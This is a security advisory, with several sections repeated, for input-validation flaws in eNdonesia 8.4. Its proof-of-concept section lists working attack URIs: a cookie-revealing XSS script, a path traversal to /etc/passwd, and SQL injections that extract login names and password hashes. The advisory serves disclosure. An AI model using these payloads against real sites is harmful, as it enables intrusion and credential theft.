Endonesia Multiple Scripts Multiple Input Validation Vulnerabilities
BID:21333
Info
Endonesia Multiple Scripts Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 21333 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 26 2006 12:00AM |
| Updated: | Jan 02 2007 03:41PM |
| Credit: | z1ckX(ru) <[email protected]> is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
eNdonesia eNdonesia 8.4 |
| Not Vulnerable: | |
Discussion
Endonesia Multiple Scripts Multiple Input Validation Vulnerabilities
eNdonesia is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify sensitive data, exploit latent vulnerabilities in the underlying database implementation, or execute arbitrary script code in the context of the application.
Version 8.4 is vulnerable; other versions may also be affected.
eNdonesia is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify sensitive data, exploit latent vulnerabilities in the underlying database implementation, or execute arbitrary script code in the context of the application.
Version 8.4 is vulnerable; other versions may also be affected.
Exploit / POC
Endonesia Multiple Scripts Multiple Input Validation Vulnerabilities
An attacker can exploit these vulnerabilities via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/en/mod.php?mod=[XSS]&op=viewlink&cid=5
http://www.example.com/en/friend.php your Friend:[XSS]
http://www.example.com/en/admin.php Main Text: [XSS]
http://www.example.com/en/mod.php?mod=informasi&op=showinfo&intypeid=><script>document.write(document.cookie)</script>
http://www.example.com/en/mod.php?mod=../../../../../etc/passwd%00
http://www.example.com/en/mod.php?mod=diskusi&op=viewdisk&did=-4%20union%20select%200,0,name,0,pwd,0,0%20from%20authors/* - LOGIN AND PASS (MD5)
http://www.example.com/en/mod.php?mod=katalog&op=viewlink&cid=-2%20union%20select%200,pwd,0%20from%20authors%20where%20counter=1/*
http://www.example.com/en/mod.php?mod=diskusi&op=viewcat&cid=-2%20union%20select%200,0,0/*
An attacker can exploit these vulnerabilities via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/en/mod.php?mod=[XSS]&op=viewlink&cid=5
http://www.example.com/en/friend.php your Friend:[XSS]
http://www.example.com/en/admin.php Main Text: [XSS]
http://www.example.com/en/mod.php?mod=informasi&op=showinfo&intypeid=><script>document.write(document.cookie)</script>
http://www.example.com/en/mod.php?mod=../../../../../etc/passwd%00
http://www.example.com/en/mod.php?mod=diskusi&op=viewdisk&did=-4%20union%20select%200,0,name,0,pwd,0,0%20from%20authors/* - LOGIN AND PASS (MD5)
http://www.example.com/en/mod.php?mod=katalog&op=viewlink&cid=-2%20union%20select%200,pwd,0%20from%20authors%20where%20counter=1/*
http://www.example.com/en/mod.php?mod=diskusi&op=viewcat&cid=-2%20union%20select%200,0,0/*
Solution / Fix
Endonesia Multiple Scripts Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
Endonesia Multiple Scripts Multiple Input Validation Vulnerabilities
References:
References:
- eNdonesia Homepage (eNdonesia)